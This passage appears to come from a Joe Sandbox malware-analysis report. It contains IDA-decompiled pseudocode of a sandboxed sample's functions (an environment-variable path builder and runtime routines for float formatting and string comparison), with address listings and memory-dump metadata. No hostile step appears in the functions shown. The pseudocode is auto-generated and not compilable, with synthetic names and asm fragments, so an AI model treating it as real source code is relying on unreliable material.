				WCHAR* _t103;
				signed short* _t106;
				signed short* _t109;
				signed short* _t113;
				short* _t114;
				short* _t115;
				signed short* _t116;
				WCHAR* _t119;
				signed short* _t122;
				signed int _t123;
				signed short* _t124;
				void* _t125;
				WCHAR* _t126;
				signed short* _t127;
				void* _t128;
				intOrPtr* _t129;
				WCHAR* _t131;
				signed short* _t133;
				short* _t134;
				signed short* _t136;
				short* _t137;
				signed short* _t138;
				void* _t139;

				_t129 = E002429BD(__edx, _t128, __eflags, 0x10);
				 *((intOrPtr*)(_t129 + 8)) = 0x25b810;
				 *((intOrPtr*)(_t129 + 0xc)) = 0xb;
				 *_t129 = 0x25b81c;
				 *((intOrPtr*)(_t129 + 4)) = 0x16;
				_v24 = E00241DEF(_t129, __edx, _t125);
				 *_t129 = 0x25b840;
				 *((intOrPtr*)(_t129 + 4)) = 0x14;
				_t54 = E00241DEF(_t129, __edx, _t125);
				_t83 = _a4;
				_v28 = _t54;
				_t8 = _t83 + 0x10; // 0x444dabef
				_t84 =  *_t8;
				_t126 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_v20 = _t126;
				_t58 = HeapAlloc(GetProcessHeap(), 8, 0x200);
				_t89 = _t84;
				_t131 = _t58;
				_v12 = _t131;
				_v8 = 0;
				_v16 = 0;
				_t13 =  &(_t89[1]); // 0x444dabf1
				_t113 = _t13;
				do {
					_t60 =  *_t89;
					_t89 =  &(_t89[1]);
				} while (_t60 != _v8);
				if(_t89 != _t113) {
					_t127 = _v16;
					_t124 = _t84;
					_t139 = _t131 - _t84;
					while(1) {
						_t80 =  *_t124 & 0x0000ffff;
						if(_t80 == 0x5c) {
							break;
						}
						_t109 = _t84;
						 *(_t139 + _t124) = _t80;
						_t127 = _t127 + 1;
						_t124 =  &(_t124[1]);
						_t17 =  &(_t109[1]); // 0x444dabf1
						_v16 = _t17;
						do {
							_t82 =  *_t109;
							_t109 =  &(_t109[1]);
						} while (_t82 != _v8);
						if(_t127 < _t109 - _v16 >> 1) {
							continue;
						}
						break;
					}
					_t126 = _v20;
					_t131 = _v12;
				}
				_t92 = _t131;
				_t23 =  &(_t92[1]); // 0x25b812
				_t114 = _t23;
				do {
					_t61 =  *_t92;
					_t92 =  &(_t92[1]);
				} while (_t61 != _v8);
				if(_t92 - _t114 >> 1 != 2) {
					GetEnvironmentVariableW(_t131, _t126, 0x200);
					_t95 = _t131;
					__eflags = 0;
					_t35 =  &(_t95[1]); // 0x2
					_t115 = _t35;
					do {
						_t63 =  *_t95;
						_t95 =  &(_t95[1]);
						__eflags = _t63;
					} while (_t63 != 0);
					_t96 = _t95 - _t115;
					__eflags = _t96;
					_t116 = _t84;
					_t97 = _t96 >> 1;
					_t36 =  &(_t116[1]); // 0x444dabf1
					_t133 = _t36;
					do {
						_t64 =  *_t116;
						_t116 =  &(_t116[1]);
						__eflags = _t64 - _v8;
					} while (_t64 != _v8);
					while(1) {
						__eflags = _t97 - _t116 - _t133 >> 1;
						if(_t97 >= _t116 - _t133 >> 1) {
							goto L31;
						}
						_t119 = _t126;
						_t38 =  &(_t119[1]); // 0x2
						_t134 = _t38;
						do {
							_t65 =  *_t119;
							_t119 =  &(_t119[1]);
							__eflags = _t65 - _v8;
						} while (_t65 != _v8);
						_t66 = _t84[_t97];
						_t97 = _t97 + 1;
						__eflags = _t97;
						_t126[_t119 - _t134 >> 1] = _t66;
						_t122 = _t84;
						_t44 =  &(_t122[1]); // 0x444dabf1
						_t133 = _t44;
						do {
							_t67 =  *_t122;
							_t122 =  &(_t122[1]);
							__eflags = _t67 - _v8;
						} while (_t67 != _v8);
					}
				} else {
					_t100 = _t84;
					_t123 = 0;
					_t25 =  &(_t100[1]); // 0x444dabf1
					_t136 = _t25;
					do {
						_t76 =  *_t100;
						_t100 =  &(_t100[1]);
					} while (_t76 != _v8);
					if(_t100 != _t136) {
						do {
							_t103 = _t126;
							_t27 =  &(_t103[1]); // 0x2
							_t137 = _t27;
							do {
								_t77 =  *_t103;
								_t103 =  &(_t103[1]);
							} while (_t77 != _v8);
							_t78 = _t84[_t123];
							_t123 = _t123 + 1;
							_t126[_t103 - _t137 >> 1] = _t78;
							_t106 = _t84;
							_t33 =  &(_t106[1]); // 0x444dabf1
							_t138 = _t33;
							do {
								_t79 =  *_t106;
								_t106 =  &(_t106[1]);
							} while (_t79 != _v8);
						} while (_t123 < _t106 - _t138 >> 1);
					}
				}
				L31:
				lstrcatW(_t126, "\\");
				_t47 = _a4 + 0x14; // 0x3c4268ab
				lstrcatW(_t126,  *_t47);
				 *(_a4 + 0x10) = _t126;
				HeapFree(GetProcessHeap(), 8, _v12);
				E002429B8(_v24);
				E002429B8(_v28);
				return 1;
			}

0x002410dd
0x002410e2
0x002410e9
0x002410f0
0x002410f6
0x00241104
0x00241107
0x0024110d
0x00241114
0x00241119
0x00241123
0x00241126
0x00241126
0x0024113d
0x00241141
0x0024114b
0x0024114d
0x0024114f
0x00241153
0x00241156
0x00241159
0x0024115c
0x0024115c
0x0024115f
0x0024115f
0x00241162
0x00241165
0x0024116f
0x00241171
0x00241174
0x00241176
0x00241178
0x00241178
0x0024117e
0x00000000
0x00000000
0x00241180
0x00241182
0x00241186
0x00241187
0x0024118a
0x0024118d
0x00241190
0x00241190
0x00241193
0x00241196
0x002411a3
0x00000000
0x00000000
0x00000000
0x002411a3
0x002411a5
0x002411a8
0x002411a8
0x002411ab
0x002411ad
0x002411ad
0x002411b0
0x002411b0
0x002411b3
0x002411b6
0x002411c3
0x00241224
0x0024122a
0x0024122c
0x0024122e
0x0024122e
0x00241231
0x00241231
0x00241234
0x00241237
0x00241237
0x0024123c
0x0024123c
0x0024123e
0x00241240
0x00241242
0x00241242
0x00241245
0x00241245
0x00241248
0x0024124b
0x0024124b
0x00241282
0x00241286
0x00241288
0x00000000
0x00000000
0x00241253
0x00241255
0x00241255
0x00241258
0x00241258
0x0024125b
0x0024125e
0x0024125e
0x00241264
0x0024126c
0x0024126c
0x0024126d
0x00241271
0x00241273
0x00241273
0x00241276
0x00241276
0x00241279
0x0024127c
0x0024127c
0x00241276
0x002411c5
0x002411c5
0x002411c9
0x002411cb
0x002411cb
0x002411ce
0x002411ce
0x002411d1
0x002411d4
0x002411de
0x002411e4
0x002411e4
0x002411e6
0x002411e6
0x002411e9
0x002411e9
0x002411ec
0x002411ef
0x002411f5
0x002411fd
0x002411fe
0x00241202
0x00241204
0x00241204
0x00241207
0x00241207
0x0024120a
0x0024120d
0x00241217
0x0024121b
0x002411de
0x0024128a
0x00241296
0x0024129b
0x0024129f
0x002412a4
0x002412b0
0x002412b9
0x002412c1
0x002412d0

APIs

GetProcessHeap.KERNEL32(00000008,00000200), ref: 00241129
HeapAlloc.KERNEL32(00000000), ref: 00241136
GetProcessHeap.KERNEL32(00000008,00000200), ref: 00241144
HeapAlloc.KERNEL32(00000000), ref: 0024114B
GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000200), ref: 00241224
lstrcatW.KERNEL32(00000000,00259728), ref: 00241296
lstrcatW.KERNEL32(00000000,3C4268AB), ref: 0024129F
GetProcessHeap.KERNEL32(00000008,0025B810), ref: 002412A9
HeapFree.KERNEL32(00000000), ref: 002412B0

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 002485E0, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305

C-Code - Quality: 75%

			E002485E0(void* __edx, signed int* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t2 =  &_a8; // 0x244e5a
				_t184 =  *_t2;
				 *_t184 = 0;
				E00244842(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00252240( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00252240( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00243C20(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00252240( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00252160();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00252160();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00252160();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E002488E3(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00252EA0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00247BEF();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0024791D();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x002485e0
0x002485eb
0x002485f2
0x002485f4
0x002485f4
0x002485f6
0x002485f6
0x002485ff
0x00248601
0x00248606
0x0024860c
0x00248622
0x00248627
0x0024862a
0x00248637
0x0024863c
0x00248690
0x00248698
0x0024869a
0x0024869c
0x0024869f
0x0024869f
0x0024869f
0x002486a5
0x002486ad
0x002486c0
0x002486c3
0x002486c5
0x002486c8
0x002486c9
0x002486ea
0x002486ed
0x002486ed
0x002486cb
0x002486cb
0x002486cd
0x002486d8
0x002486d8
0x002486da
0x002486e1
0x002486dc
0x002486dc
0x002486dc
0x002486da
0x002486ee
0x002486f0
0x002486f1
0x002486f4
0x002486f6
0x0024870a
0x002486f8
0x002486f8
0x002486f8
0x0024870f
0x0024870f
0x00248714
0x00248717
0x00248722
0x00248722
0x00248722
0x00248722
0x00248726
0x0024872d
0x0024872e
0x00248731
0x00248734
0x00248734
0x00248736
0x00000000
0x00000000
0x0024874e
0x00248755
0x00248759
0x0024875c
0x0024875f
0x00248761
0x00248761
0x00248761
0x00248763
0x00248766
0x00248769
0x0024876b
0x00248773
0x00248779
0x0024877c
0x0024877f
0x00248780
0x00248783
0x00248786
0x00248786
0x0024878b
0x0024878e
0x00000000
0x00000000
0x002487a6
0x002487ab
0x002487af
0x00000000
0x00000000
0x002487b3
0x002487b6
0x002487b7
0x002487b7
0x002487b9
0x002487bc
0x00000000
0x00000000
0x002487be
0x002487c1
0x002487c8
0x002487cb
0x002487ce
0x002487e4
0x002487e4
0x002487e4
0x002487d0
0x002487d0
0x002487d2
0x002487d5
0x002487e0
0x002487d7
0x002487da
0x002487da
0x002487d5
0x00000000
0x002487ce
0x002487c3
0x002487c3
0x002487c5
0x002487c5
0x00248719
0x00248719
0x0024871c
0x002487e7
0x002487e7
0x002487e9
0x002487eb
0x002487ee
0x002487ef
0x002487f0
0x002487f1
0x002487f9
0x002487f9
0x002487f9
0x002487fb
0x002487fe
0x00248801
0x00248803
0x00248803
0x00248805
0x00248817
0x0024881b
0x0024881e
0x00248825
0x0024882d
0x0024882d
0x00248830
0x00248832
0x00248843
0x00248843
0x00248847
0x00248847
0x0024884a
0x0024884c
0x0024884f
0x00000000
0x00248834
0x00248834
0x0024883a
0x0024883a
0x0024883e
0x00248851
0x00248851
0x00248855
0x00248856
0x00248858
0x0024885a
0x0024889b
0x0024889b
0x0024889d
0x002488aa
0x002488aa
0x002488ac
0x002488ae
0x002488af
0x002488b0
0x002488b7
0x002488ba
0x002488bc
0x002488bc
0x002488bd
0x002488bf
0x002488c2
0x002488c2
0x002488c4
0x002488c6
0x00000000
0x002488c6
0x0024889f
0x002488a1
0x00000000
0x00000000
0x002488a3
0x00000000
0x00000000
0x002488a5
0x002488a8
0x00000000
0x00000000
0x00000000
0x002488a8
0x00248861
0x00248867
0x00248867
0x00248869
0x0024886a
0x0024886b
0x0024886c
0x00248873
0x00248876
0x00248878
0x00248879
0x0024887b
0x00248888
0x00248888
0x0024888a
0x0024888c
0x0024888d
0x0024888e
0x00248895
0x00248898
0x0024889a
0x0024889a
0x00000000
0x0024889a
0x0024887d
0x0024887d
0x0024887f
0x00000000
0x00000000
0x00248881
0x00000000
0x00000000
0x00248883
0x00248886
0x00000000
0x00000000
0x00000000
0x00248886
0x00248863
0x00248865
0x00000000
0x00000000
0x00000000
0x00248865
0x00248836
0x00248838
0x00000000
0x00000000
0x00000000
0x00248838
0x00248832
0x00000000
0x0024871c
0x00248717
0x0024863e
0x00248640
0x00000000
0x00248642
0x00248658
0x0024865d
0x0024865f
0x0024866b
0x00248671
0x00248672
0x00248674
0x00248676
0x00248681
0x00248681
0x00248684
0x00248686
0x00248686
0x00248689
0x00248661
0x00248661
0x00248661
0x00000000
0x0024865f
0x0024860e
0x0024860e
0x00248615
0x00248616
0x00248618
0x002488ca
0x002488ce
0x002488d3
0x002488d3
0x002488e2
0x002488e2

APIs

_strrchr.LIBVCRUNTIME ref: 0024866B
__alldvrm.INT64 ref: 0024886C
__alldvrm.INT64 ref: 0024888E
__alldvrm.INT64 ref: 002488B0

Strings

ZN$, xrefs: 002485F6, 00248651, 0024866A, 002487F0
ZN$, xrefs: 0024882D
ZN$, xrefs: 002485EA

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024E617, Relevance: 10.8, APIs: 7, Instructions: 268

C-Code - Quality: 83%

			E0024E617(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x25b018; // 0x6083b07a
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E0024F1E9(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E0024F1E9(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E00246F07(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00252260();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E00246F07(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00252260();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E0024ACEC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E0024B736(_t130);
													}
												}
											}
										}
									}
								}
								E0024B736(_t100);
							}
						}
					}
				}
				L63:
				return E00243541(_v8 ^ _t132);
			}

0x0024e61f
0x0024e626
0x0024e62e
0x0024e631
0x0024e637
0x0024e63a
0x0024e63d
0x0024e641
0x0024e644
0x0024e649
0x0024e670
0x00000000
0x00000000
0x00000000
0x00000000
0x0024e64b
0x0024e653
0x0024e655
0x0024e659
0x0024e659
0x0024e65e
0x0024e67c
0x00000000
0x00000000
0x00000000
0x00000000
0x0024e660
0x0024e669
0x0024e67e
0x0024e67e
0x0024e683
0x0024e68a
0x0024e68d
0x0024e68d
0x0024e692
0x0024e69e
0x0024e6ab
0x0024e6b8
0x0024e6cb
0x00000000
0x0024e6cd
0x0024e6cf
0x0024e702
0x00000000
0x0024e704
0x0024e706
0x0024e70a
0x0024e710
0x0024e713
0x0024e715
0x0024e718
0x0024e718
0x0024e71d
0x00000000
0x00000000
0x0024e71f
0x0024e723
0x0024e72d
0x0024e732
0x00000000
0x0024e734
0x00000000
0x0024e734
0x0024e732
0x00000000
0x0024e723
0x0024e718
0x0024e713
0x00000000
0x0024e70a
0x0024e6d1
0x0024e6d3
0x0024e6d7
0x0024e6dd
0x0024e6e0
0x0024e6e2
0x0024e6e2
0x0024e6e7
0x00000000
0x00000000
0x0024e6e9
0x0024e6ed
0x0024e6f7
0x0024e6fc
0x00000000
0x0024e6fe
0x00000000
0x0024e6fe
0x0024e6fc
0x00000000
0x0024e6ed
0x0024e6e2
0x0024e6e0
0x00000000
0x0024e6d7
0x0024e6cf
0x0024e6ba
0x0024e6ba
0x0024e6ba
0x00000000
0x0024e6ba
0x0024e6ad
0x0024e6ad
0x0024e6af
0x0024e6a0
0x0024e6a0
0x0024e6a2
0x0024e6a2
0x0024e739
0x0024e739
0x0024e739
0x0024e746
0x0024e74c
0x0024e751
0x0024e672
0x0024e757
0x0024e757
0x0024e75f
0x0024e763
0x0024e7be
0x0024e7c0
0x00000000
0x0024e765
0x0024e76a
0x0024e76c
0x0024e76e
0x0024e776
0x0024e79a
0x0024e79f
0x0024e7a4
0x0024e7aa
0x00000000
0x0024e7b0
0x0024e7b0
0x00000000
0x0024e7b0
0x0024e778
0x0024e77a
0x0024e77e
0x0024e783
0x0024e785
0x0024e78a
0x0024e89f
0x0024e89f
0x0024e790
0x0024e790
0x0024e7b6
0x0024e7b6
0x0024e7b9
0x0024e7c3
0x0024e7c5
0x00000000
0x0024e7cb
0x0024e7d3
0x0024e7e1
0x00000000
0x0024e7e7
0x0024e7f0
0x0024e7f6
0x0024e7fb
0x00000000
0x0024e801
0x0024e801
0x0024e804
0x0024e809
0x0024e80d
0x0024e859
0x00000000
0x0024e80f
0x0024e814
0x0024e816
0x0024e818
0x0024e820
0x0024e83d
0x0024e847
0x0024e849
0x0024e84c
0x00000000
0x0024e84e
0x0024e84e
0x00000000
0x0024e84e
0x0024e822
0x0024e824
0x0024e828
0x0024e82d
0x0024e831
0x0024e893
0x0024e893
0x0024e833
0x0024e833
0x0024e854
0x0024e854
0x0024e85b
0x0024e85d
0x00000000
0x0024e876
0x0024e876
0x0024e88f
0x0024e88f
0x0024e85d
0x0024e831
0x0024e820
0x0024e897
0x0024e89c
0x0024e7fb
0x0024e7e1
0x0024e7c5
0x0024e78a
0x0024e776
0x0024e8a3
0x0024e8a9
0x0024e751
0x0024e692
0x0024e65e
0x0024e8ab
0x0024e8be

APIs

